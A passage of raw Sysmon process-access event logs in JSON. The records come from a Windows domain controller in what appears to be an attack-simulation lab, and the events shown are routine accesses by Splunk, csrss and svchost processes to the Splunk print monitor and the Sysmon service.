Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0373-5F25-0000-0010D4E60A00}\r\nTargetProcessId: 1540\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:55.674","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0373-5F25-0000-0010D4E60A00}","TargetProcessId":"1540","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5844,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:55.674\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0373-5F25-0000-0010D4E60A00}\r\nTargetProcessId: 1540\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:55.674","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0373-5F25-0000-0010D4E60A00}","TargetProcessId":"1540","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5845,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:55.674\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:55.674","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5846,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:55.674\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:55.674","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5847,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:55.674\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:55.674","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5848,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:55.674\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:55.674","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5849,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:55.674\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:55.674","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5850,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:55.674\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:55.674","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5851,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:55.674\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 